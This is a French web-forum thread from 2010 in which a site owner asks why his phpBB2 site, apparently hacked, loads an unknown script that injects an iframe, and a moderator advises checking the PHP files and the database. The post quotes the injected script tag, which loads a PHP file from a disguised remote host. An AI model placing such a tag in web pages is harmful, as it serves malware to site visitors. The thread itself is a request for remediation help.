Site Hacké - Besoin d'Aide

LordVizor Messages postés 12 Date d'inscription lundi 25 juin 2007 Statut Membre Dernière intervention 26 février 2010 - 26 févr. 2010 à 17:02
nickadele Messages postés 1251 Date d'inscription mercredi 7 août 2002 Statut Modérateur Dernière intervention 10 avril 2013 - 3 mars 2010 à 14:03
Bonjour,

Notre site web www.pagon.org/v1 s'est fait semble t-il hacké.

Lorsque la page charge, un script inconnu charge également et tente de créer une iframe en bas de page. (Attendez 3 secondes et déroulez tout en bas de page pour voir un espace).

Grace à firebug sous firefox j'ai identifié ce script:

<script defer="1" src="http://ggpht-com.timeanddate.com.pornhub-com.tagteamexpo.ru:8080/google.com/google.com/rediff.com/depositfiles.com/advmaker.ru.php"></script>



Cependant je ne comprend absolument pas d'où il sort vu qu'il ne figure pas dans le code source du site...

Ce bug est présent sur toutes les pages du site même une fois qu'on est loggué.

Je précise que nous utilisons un système de PHPBB2 (Forum amélioré).

Savez vous comment faire pour résoudre le problème?

Merci d'avance ;)

1 réponse

nickadele Messages postés 1251 Date d'inscription mercredi 7 août 2002 Statut Modérateur Dernière intervention 10 avril 2013
3 mars 2010 à 14:03
Bonjour,

ce que je te conseil :
1. Identifier la zone dans la page HTML où apparaît ce code. Cela te permettra de +/- identifier la source infectée.
1. vérifier les pages (php) coté serveur pour t'assurer que le code n'a pas été changé. A mon avis c'est le cas. Nettoyer.
2. Si ce n'est pas le cas, vérifier le contenu en base de données. Nettoyer.


Nickadele
non, ma belle ne s'appel pas Adèle
Mon Blog
0
Rejoignez-nous